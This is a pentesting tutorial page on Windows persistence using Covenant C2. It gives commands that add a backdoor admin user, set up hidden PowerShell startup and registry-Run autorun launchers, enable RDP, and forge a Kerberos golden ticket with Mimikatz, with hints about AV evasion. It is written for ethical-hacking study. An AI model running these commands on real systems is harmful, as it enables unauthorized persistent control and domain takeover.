# Persistence Here we assume we have a shell with administrative privileges on the target ## Create a new user ### Covenant * Select Interact in your grunt * Use `shellcmd net users username password /add` (Note: for a real context engagement we need to make a safe password and a recognizable username such as the name of the company we work for) * we can check that the user has been successfully added using `shell net users` * Now we need to add our user to the administrators group using `shell net localgroup administrators username /add` ## Startup Persistence ### Covenant * This method will ibject a payload in the startup tasks * In your grunt go to the tab Task in the GruntTask list choose `PersistStartup` * You should see this in the Payload input: `powershell -Sta -Nop -Window Hidden -EncodedCommand ` replace the blah with a powershell encoded launcher and click on Task * If we restart the target machine and login again there we should get our shell back ***Note: Windows Defender is really efficient in detecting this so you might have to try different things for AV evasion*** ## Autorun Persistence ### Covenant * Go to launcher, select `Binary Launcher` Generate one and Download it * Go back to your high integrity grunt, go to the task tab * In the GruntTack Select `PersistAutorun`, choose a directory in where to upload the binary * Go to the interact tab type Upload put the Directory in the file path and select the bin file you download previously * You can check if the bin was successfuly added to the Registry using this cmd: `GetRegistryKey HCKU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` * Once you restart you should have a shell back ***Note: Windows Defender is really efficient in detecting this so you might have to try different things for AV evasion*** ## Persistence with RDP * With an initial shell on a machine with covenant * Enable Remote Desktop in our target: in the interact tab we can type this `powershell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"` * We could then connect to the target using rdp and disabling anti-virus this way * Disable Remote Desktop Commection: `powershell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f; Disable-NetFirewallRule -DisplayGroup "Remote Desktop"` ## Golden Ticket Persistence * Here we will powershell along with powerview\.ps1 and invoke-mimikatz.ps1 * `. .\powerview.ps1` * `Get-DomainSID` this will give us the domain SID, we will need to copy it * `. .\invoke-mimikatz.ps1` * `Invoke-Mimikatz -Command '"kerberos::golden /user:administrator /domain:domain.local /sid:PUT-THE-SID-HERE /krbtgt:PUT-HERE-TICKET-OF-DC-KRBTGT /ptt"'` * We should be a domain administrator and have control of the domain controller and we can promote a compromised user to domain admins ## Resources {% embed url="" %} TCM security Academy - Movement pivoting and persistence for pentesters and ethical hacker {% endembed %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://csbygb.gitbook.io/pentips/windows/persistence.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.